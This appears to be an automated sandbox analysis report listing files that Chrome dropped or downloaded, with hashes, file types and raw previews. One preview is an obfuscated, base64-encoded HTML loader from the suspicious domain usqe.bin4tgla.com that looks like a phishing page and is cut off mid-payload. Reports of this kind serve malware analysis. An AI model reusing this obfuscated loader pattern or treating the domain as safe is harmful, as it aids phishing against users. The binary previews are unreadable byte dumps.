                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,....@7..6*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]Y+.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]Y3.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]Y3.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]Y3............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]Y5............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v/uT.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):227898
                                                                                                                                                                                                                                                                  Entropy (8bit):5.38498285820349
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:tOfnGOo43+EG6hF8bfQc8NJAyxDscqhZGkzyxtznqnYUv+dIbLEOKv:TOo43U4c8QT2pnqbv+dIbLEOW
                                                                                                                                                                                                                                                                  MD5:483833CB6162C627DE1845CB475A73B9
                                                                                                                                                                                                                                                                  SHA1:82C3FA2F439105AFABC5C4967FD063DCBADAAC1C
                                                                                                                                                                                                                                                                  SHA-256:641D06A33C26BCB862EFB7273FBDD98BD37927E73AA59D77CD18712053A1622D
                                                                                                                                                                                                                                                                  SHA-512:5BEF95F37E606385E331806E20C0409EC877336EF9298B8D86236AE5A367A72E14994F96E0CB616ED376513EF8936769B177C4D8E8D729348B54D70689057830
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:(()=>{var e,t,r={40591:(e,t,r)=>{"use strict";var n={};r.r(n),r.d(n,{fetchClientNavigation:()=>ln,fetchCountry:()=>gn,fetchDefaultDeliveryCountry:()=>bn,fetchNavigation:()=>un,fetchPaymentProviders:()=>yn,fetchSitecoreBearerToken:()=>Sn,fetchSocialTags:()=>vn,fetchSuggestions:()=>hn,fetchTargetedContent:()=>jn,fetchTemplateFromBlobStorage:()=>xn,fetchWelcomeMessage:()=>On,getDeliveryOptions:()=>wn,sendEventToAlfred:()=>Cn});var o=r(31542);const i="asos",a="siteChrome",c="sdk",l="subscriptions",d="audience",u="_versionManifest",p="_initialStore",m="_initialBreadcrumbs",h="_tokenValues",g="_config",y="CLIENT_",f="bag",b="stc-welcome-message",v="userTookActionOnWelcomeMessage",w="resolvedDeliveryCountry",O="cappedPageCount",j="localStorageCacheError",S=(e,t)=>{const r=[];for(let n=0;n<localStorage.length;n++){const s=localStorage.key(n);s!==t&&s.startsWith(e)&&r.push(s)}r.forEach((e=>localStorage.removeItem(e)))},x=async function(e){const{cacheKeyPrefix:t,returnCachedOnDelegateFailure:r,r
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (8493), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):21497
                                                                                                                                                                                                                                                                  Entropy (8bit):5.848458615985076
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:aEw6qAdH5wkLAaF6XJUdO9OgTdwEmxElITmbq6qAdH5wkLAaF6XJUdO9OgTdbRqz:53dH956atgTdO+3dH956atgTdAlrOlr6
                                                                                                                                                                                                                                                                  MD5:19773BA5C37CBDD3188D965A0ADB7907
                                                                                                                                                                                                                                                                  SHA1:B86238097ED45899BE9427EA14B1CCBD16F455B1
                                                                                                                                                                                                                                                                  SHA-256:DD18789248673D8BC5201B9996DA44FB075A9F6EBEAD33CD48FD42436F009211
                                                                                                                                                                                                                                                                  SHA-512:012F80CD63FB2590FC2140CFA3782C8954E89644AFEBEE59EE0EB79E47110344A72685953EF156515B75B29C33D7061CD481313F7497DE41031DA2B190637EE1
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://usqe.bin4tgla.com/fpI2Ggql/
                                                                                                                                                                                                                                                                  Preview:<script>..if("https://uSqe.bin4tgla.com/fpI2Ggql/" == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCjwhLS0gQSBzYXRpc2ZpZWQgY3VzdG9tZXIgaXMgdGhlIGJlc3QgYnVzaW5lc3Mgc3RyYXRlZ3kgb2YgYWxsLiAtLT4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NvZGUuanF1ZXJ5LmNvbS9qcXVlcnktMy42LjAubWluLmpzIj48L3NjcmlwdD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9yZWNhcHRjaGEvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KICAgIDxzdHlsZT4NCiNCYm5Qa2l1RlVRICogew0KICAgIHBhZGRpbmc6IDA7DQogICAgbWFyZ2luOiAwOw0KICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7DQogICAgZm9udC1mYW1pbHk6ICJTZWdvZSBVSSIsIkhlbHZldGljYSBOZXVlIiwiTHVjaWRhIEdyYW5kZSIsUm9ib3RvLEVicmltYSwiTm
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):2941
                                                                                                                                                                                                                                                                  Entropy (8bit):7.909276343163651
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:cYg3H1ESrRSL18k5JBbuRdf5wMO1olTpQG6Fq7Y+tEQz8eyZIz071:Jg3VESQek5JBWfwDYSFIOQz8G0x
                                                                                                                                                                                                                                                                  MD5:3B3B7074D0DDCB23F3252C28322A4209
                                                                                                                                                                                                                                                                  SHA1:27D894D07D5B998D8237D676A6C7B7D10FD0C192
                                                                                                                                                                                                                                                                  SHA-256:E45294734EFD85FDC485835B30C844B6F40AF18A9C9B86D150F465880FF01FC0
                                                                                                                                                                                                                                                                  SHA-512:99234E4F3E0681A657E07DA46221982C48E16CFE2485F21D34F5CD0F3EDE1910B6742075E63CE8D24ADC825E107346E4975D53FF4E00CCB7997D72811D305196
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/storesa/images/flags/nl.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB........7IDATx..{.T....=..swv..e..Pu5YP.AM......L.....6$.6.1..1..mj...Hi.15i...M..? .`...4..B.M.."..y.}..=.g...3.b.!3..s~......~..Eas....P.D.\.W.^.zu..5...d,b.v....BBQ..JG.)_..>..|.o..mA........f.[..K..lC.f6.9k.}Yf....6cu......|...AM._.l9...3.....i$Y.....n.0r;...n..Y..p.c.Q.q..Fq...#..b6.c..t:.'.9.rV..D+..i.#?...;d.(6cA....x..K.W.....Mf.....M..,H....q=.".9..%...dy..2.E.....<..Lo..h...`:...K.g.V7DH.....kdi.D..%..............l..........5...A.w7Z...%ha.G]I(3[_4t.4A.#......r\..yv..jGC....uw.gs......p.uX...|.i..4.L..s...Ph...._......_..9l.dl.(..(..e..........=r..u..]....F.......v...^.?a.w...1.g.E.s.,>b.E.F;............{Z..D....=.....h......\....$G uq. ..mY..&..Z.T3.Wc.}n.......];U?...-..I...._......`...R..........S7X.....i3.,.E......N.12..s.[.<.k....u......5v..{...Z....=s"g.x..1.j........].j1..Jx]w.<.b0.......:..5...l...c..-,......t.n...Bg.^..UG.G....el..D.,.1...@....hr!g..\r4.V..Je
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2089
                                                                                                                                                                                                                                                                  Entropy (8bit):7.751925620219813
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:IvmuERAoDKoHIEmLN0CWLqHNz90gik8ZLD:yExmz1vWSN50gi7D
                                                                                                                                                                                                                                                                  MD5:58CFBD85D0631A0C45BBBF5BD5A38212
                                                                                                                                                                                                                                                                  SHA1:C286C5893086E2610FE799D453ACF71F90BCB3E9
                                                                                                                                                                                                                                                                  SHA-256:A840AF3A71FE2B7F2F185D1294F5C342EA310509629C26CBCD2F6EE71AC729CA
                                                                                                                                                                                                                                                                  SHA-512:B38A30B13674F8344722B28C1F860A9969B46870A1AC99D54907832B22FC4E7A0AE325733D9459F11B0AB7A4126E2EC85D0336B275CBA0793213E51846EFE3C7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....b....d.Cq.V...U.......Hu....N......n.......h.&.A".....*(e.P...a.c.Q.$.*mM..9.i.`.'.."Y.m...<........{.i.2E..r8..l&$.`.zqN...Y.>.8./j.o.#.5..%.8..'..+[.'}.....X..1.TU.:...=).JL...*9..*.).ZcHq.sE.C..z.L.nph..<..[.+..C......]...G.#.?.N.....@..qV'.xR.....Z.d..%..$.PpX....T.rY[..vg.Q.@~.b..*...+]...v.....n..t...T..W..f.}N.M3U..#.......%....I.N...'......X.u...
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                                  MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                                  SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                                  SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                                  SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://pixel.wp.com/c.gif?u=https%3A%2F%2Fusqe.bin4tgla.com%2FfpI2Ggql%2F&r=&b=238502921&p=0&rand=0.5834010147506843
                                                                                                                                                                                                                                                                  Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):6099
                                                                                                                                                                                                                                                                  Entropy (8bit):7.9133745255158905
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yEvaNh9uhqV6nvY12dDgLaOREJnyp/+1ptk+x7dsvv8NrrqIymnO3NNG1dEqdkia:yUaLhYYQli/+3avgqIDQDG1HdkiZLVJI
                                                                                                                                                                                                                                                                  MD5:BEA11CF813FB2842622154D9F736C768
                                                                                                                                                                                                                                                                  SHA1:BB2C2D44052DD1495E794CD3C8E0CFE4BC9B8C42
                                                                                                                                                                                                                                                                  SHA-256:5B1AE877A66A4D4840C95AB34253A6DA1FF07C58616BA32718DC78E47A90DC75
                                                                                                                                                                                                                                                                  SHA-512:82FD4B0F6C0CC349C3BFA41F459F4E980AF5ECD934E55AE4EF933714BA13932989CD121BA6FF3E3661FBA120F6F19ABEC3C229F1861990217EE2B85E9751122F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......I.og....7D..o.h;....:...6.n/.[..P>.m.|...a~..g9...y..}2....Z.h.a.fy....$..z...u.-........q.Y.........q.X(.o........M....[./.........[..[)..N2....VF;.!ulH..U..#b.)....v..3.F$.!!.h...<..0OB9...d..EvO1.f,..t......S[..i..;5o.....d..(.eU...x;..c...:s..}...IY..i.N.<...2H.=...F.9.'..}....C.r..6.q.oJh..DNf..l0....>rK...~4..V..K.C.bGEu@.D.YH;rq.S....e..7...
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13581), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):13581
                                                                                                                                                                                                                                                                  Entropy (8bit):5.328308761729456
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:7HneA25CpTJF9qOS/ewhP6OozEK5i5m2M0ECTo/T6bpLubBFHH3GnG:7eAfIQhzEK5i5m2M0ECTo/T6bQFCG
                                                                                                                                                                                                                                                                  MD5:D1873BD76A3631DA0BEEF1D8ED9F15BA
                                                                                                                                                                                                                                                                  SHA1:6924B4BD64513F2A650672F22E7AB12F82E17748
                                                                                                                                                                                                                                                                  SHA-256:448E29C9EC460F70535C7958CD60E9E2980F935C5309D61D08F40D080A876779
                                                                                                                                                                                                                                                                  SHA-512:2E3F62F656B9CA52080219890A5ABDC5479F617B2075E0A734AF656C44DC5AA32742727C4A0F95CCE4C164AE05062B382E1F82CB38ED5E9A5F14DFF3EA320025
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:!function(){"use strict";function t(r){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(r)}function r(r){var a=function(r,a){if("object"!=t(r)||!r)return r;var n=r[Symbol.toPrimitive];if(void 0!==n){var i=n.call(r,a||"default");if("object"!=t(i))return i;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===a?String:Number)(r)}(r,"string");return"symbol"==t(a)?a:a+""}function a(t,a,n){return(a=r(a))in t?Object.defineProperty(t,a,{value:n,enumerable:!0,configurable:!0,writable:!0}):t[a]=n,t}var n={d:(t,r)=>{for(var a in r)n.o(r,a)&&!n.o(t,a)&&Object.defineProperty(t,a,{enumerable:!0,get:r[a]})},o:(t,r)=>Object.prototype.hasOwnProperty.call(t,r)},i={};n.d(i,{S:()=>l});var o={top:"paddingBottom",bottom:"paddingTop",left:"paddingRight",right:"paddingLeft"};function e(t){var r={"&":"&amp;","<":"&lt
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (18298)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):18916
                                                                                                                                                                                                                                                                  Entropy (8bit):5.6453273959723
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:/K2+nG8EXuGyW8FuKW/00BlP8rbnPrlsi1yKnaeRF+yMfRGcL6ZEm2:/K2d8E+Gzr0uSrjlygaeD3ILaEr
                                                                                                                                                                                                                                                                  MD5:87F3F1784464A56B80F04D1C64FAC841
                                                                                                                                                                                                                                                                  SHA1:66ED80D249257F5352375A3F12103538963D7CFD
                                                                                                                                                                                                                                                                  SHA-256:A7EED1CAFB8953D9B44109950C9C7C48BF6DE295975693894A9D36F7AC9D266A
                                                                                                                                                                                                                                                                  SHA-512:6156B8B9CA66D7E360AC2E6201AA78F89D0CDBD1D473EFC6BFF7C6EE8C36C15944FDF60C62DB6FE9099830350F929ED0AEDB225A9082E5F91C4ABB052AFFA344
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var z=this||self,L=function(f,b){if(f=(b=null,z).trustedTypes,!f||!f.createPolicy)return b;try{b=f.createPolicy("bg",{createHTML:T,createScript:T,createScriptURL:T})}catch(d){z.console&&z.console.error(d.message)}return b},T=function(f){return f};(0,eval)(function(f,b){return(b=L())&&f.eval(b.createScript("1"))===1?function(d){return b.createScript(d)}:function(d){return""+d}}(z)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',.'',.' Copyright Google LLC',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var W=this||self,f4=function(f,b,d,T){for(d=(T=B(f),0);b>0;b--)d=d<<8|g(f);h(T,f,d)},g=function(f){return f.G?bK(f.Y,f):e(8,f,true)},B=function(f,b){if(f.G)return bK(f.Y,f);return b=e(8,f,true),b&128&&(b^=128,f=e(2,f,true),b=(b<<2)+(f|0)),b},TL=function(f,b,d){if(d=typeof f,d=="object")if(f){if(f instanceof Array)return"array";if(f instanceof Object)return d;if((b=Object.prototy
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):5380
                                                                                                                                                                                                                                                                  Entropy (8bit):7.898971063751532
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yEm3WCi/NZ/16fX7EIX9RboJF2mI7CHVspagBFpXjtkr7tA5hz0Z:y7tml16fIn0N7AeaMjtOg0Z
                                                                                                                                                                                                                                                                  MD5:17BBE1D5A582E95F6535CD303BE75A58
                                                                                                                                                                                                                                                                  SHA1:B5E2588569EE2AD83D79E08F54A5D66B8C5FE494
                                                                                                                                                                                                                                                                  SHA-256:173965F7FD3E16B537BE8F01BFCD3C3C571798B948ED30DC087CEF602FFCB511
                                                                                                                                                                                                                                                                  SHA-512:0997BBD811C67E4AB4E4603710FA609A2181DDFF6925C7D99FDA5E4845EFE448BAA329C426CC87AE8A6CD847624516B1E64E3879C60F92F55616DE1CE1E63BBF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....S.[.K*..E}...p:q..1...$0.6[l.H23.w.......,.Q.Z....23..Wlq`c..h#$.^..y..p..nC.T...8-...:..+..;]...8.._o....WG.\.H.g.Y7>......@.r1.6.-.J"L.L`.....@.9S.d...zU../.1.R....RU[*F..?...,h.+."...o...A......6....2oW.._..r.......\."[......#/.>a..N...Hb..eh.....m.;.0..b1...$.=..A+..tb..H,....a.ds.#8Z"C..]..II#P...>_......7`.....#?.....+*..@%....[..U@..>H.I'...'x...'..$/
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4189
                                                                                                                                                                                                                                                                  Entropy (8bit):7.890627573071198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yEXcDqNjLwCmu0n6wodUhw21xqlOoWGdrIoXXA96:yGNjL/W6Rh2TsnB1XAU
                                                                                                                                                                                                                                                                  MD5:11C2359AAFCF468EC51BFDB6CD9DC298
                                                                                                                                                                                                                                                                  SHA1:746BC31D8024EEFCB69B65BDFC772DDBF819F9BE
                                                                                                                                                                                                                                                                  SHA-256:87F878F4D2B83240BFA4FF8E43270492EA579D477B9079ABC4317B1919946B7A
                                                                                                                                                                                                                                                                  SHA-512:88F2DFACD78B15C9E2A827ADA6B7995A5B0D2006A48EFC2FD3D16C38551FBCCFDA9B868E03BB0968CAEBB926FA315BD1EFD52A4ED27B0D83DAEE0339FB43EAD4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...^/...'..=.Z5..Z.-.y.a9..p*....g...F9.>..XD.0<s...^e....iYX.'.....Z..&.*...kM.j(.....b.8..@x.N..2_...+........6I.T.....B.C4./^.#.m....y.....*.x3....7.@.@S...7......R8._...k....S...C. ]H..V...rKMKV.....ywz=.@..V......m...G.v.:........Wx....N\..r....1...p...........CK......7..?*..}{...q.m.S. ..f..{_....t..M9......%S.y.Y.q..W..jUr..dp.i.....a..5Fa$7.o..0...R=..
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):5725
                                                                                                                                                                                                                                                                  Entropy (8bit):7.91144168003325
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yE+h2f45qYHDf9krzEr//588m1nfBZ7EV59fpkSvmIJiTvPeh3:yq459jFOzE7545fBZyfRO4v3
                                                                                                                                                                                                                                                                  MD5:1D47DA8B602583C435B1755B377B6AE2
                                                                                                                                                                                                                                                                  SHA1:7304E9C5D55B88EE14EA8062827F2448215CDFBF
                                                                                                                                                                                                                                                                  SHA-256:B19A9A4C0DEEE1A04413D62A669C2B8FA18C34D1E0219C469CB789E53A69BBA4
                                                                                                                                                                                                                                                                  SHA-512:1B2CB11D385F610F9C0CC24B451CC6C668736C093F7D05B4994A4A4C0F468B8F00AA191D184FC2550517A2E47C44886DB10B2CD18BD86347EE8BC3D9AE392330
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA4bYc0s2zwhr0Dhx3dOazn3Hh4p7uY3CSETn6dA6rvCiWHE9OA-nOmnfN2ANundmWGke1Bjv2xi-GV3TO2LoMbXM_R2zufPfoD0XFD4lwrhK2FVthto7931CtAU3kcdffWKVtfZ2JNZsE0pCei2Leq-gBpTy3a6KgoAUB32sE_lB_-9wzhzHVikGwjcRkW_oG1wzKT1sJC3C7lN64gfM9pbHpzGzQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=8a68f4902f9f4669
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..H.).tU8?|....=H9.<g.U.8.x.Y...........O..'.r.K)F.5...`....>...iD.y.H.'$.T... `...U.mh'........_U...-(..$Vfn..'.....Io.G......x.:.Fq....._.0G..ct;A...'.}.q@...Q.eV.s....l.....S)&.{#XA....-M+..H.....D}OV.dz..?.m%..G.\...+|.._..u.G...x..|.<...eV....}.[.p8=...Z......^|6.m....E..*...t.....P.M.....e.Zt*..[...8..p.br...y....._..j.....R..,.7p.B.pr.....#>
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 450x450, components 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):25204
                                                                                                                                                                                                                                                                  Entropy (8bit):7.95596684119694
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:eD1CdQGBoPwtOD4IkGp/wOiD4Pj8/uIsZxpbfevxUE5IolGDGS4H354y42km:ehoPttjC/wP4PDIKfev/TYDQH35
                                                                                                                                                                                                                                                                  MD5:B8019DA24C68E07D1614F15EDC6FAF60
                                                                                                                                                                                                                                                                  SHA1:602C6C0EC719765E9170BDF6BBFBEB319F0D7B72
                                                                                                                                                                                                                                                                  SHA-256:548FFFD05ADC25D285E7FDF0D4D6D1AE2C60EC613A58E8662D3ED75F2BF14257
                                                                                                                                                                                                                                                                  SHA-512:16E904BA444603FEFFCD0BA534522B46D41440518EBD22EA58A9CE5EB699D467CF72F76A45662A2063DA6399A0E8AD25D4DFE8E36F8CB022F4239B2621AA65D6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA6LY5a_sjoH9yvpmbEh0CtZQlmUakH4UvubxSxHHJkgU0G9bAzr6I0MddOzcJEu1XGBmIC2cV6m0Dxir3cdfDboH-0g8Psw8c0T-mcrf7lkroG7ZwpNHkXk3HnLiiaEN-b8-mhRh2kd6qKZhKZi_wXtMyXqY98dgFWFNcsdHZk9KqUo9Qo36_5HKbaTC9lcL1LM6e10_ZL_O3CJeFLXF6TB_DfgLQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
